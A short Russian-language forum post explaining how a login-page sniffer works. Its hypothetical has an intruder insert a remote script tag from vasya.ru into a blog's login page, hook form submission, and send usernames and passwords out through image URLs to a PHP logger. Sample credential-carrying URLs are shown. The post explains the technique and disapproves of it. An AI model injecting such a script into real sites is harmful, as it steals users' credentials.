что там объяснять
чаще всего такие скрипты вешаются на страницы с формами авторизации. при оправке формы они читают значение и создают новую картинку, у которой путь прописывается в соответствии с введенными данными
ну. сниффер, короче говоря.
есть на моём бложике страница авторизации. вася-хакер пришел ко мне домой, когда я был в умате, и вставил в страницу авторизации вот это
<script src="http://vasya.ru/check.js"></script>
в этом скрипте вешается обработчик на событие DOMContentLoaded, который ищет форму авторизации (логин,пароль)
заодно вешает на отправку формы свой обработчик.
когда форма отправляется, создается картинка. путь у неё, к примеру,такой
|
Код:
|
http://vasya.ru/sniff.php?name=pelmen&password=1234567890
http://vasya.ru/sniff.php?name=MAZOK&password=93d2h1er2hj
http://vasya.ru/sniff.php?name=vasya&password=test |
там сидит php скрипт,который тупо записывает эти данные в базу данных
потом,когда вася заходит на свою уютненькую БД, видит список, кто авторизировался
.......
за такое можно и по хлебалу получить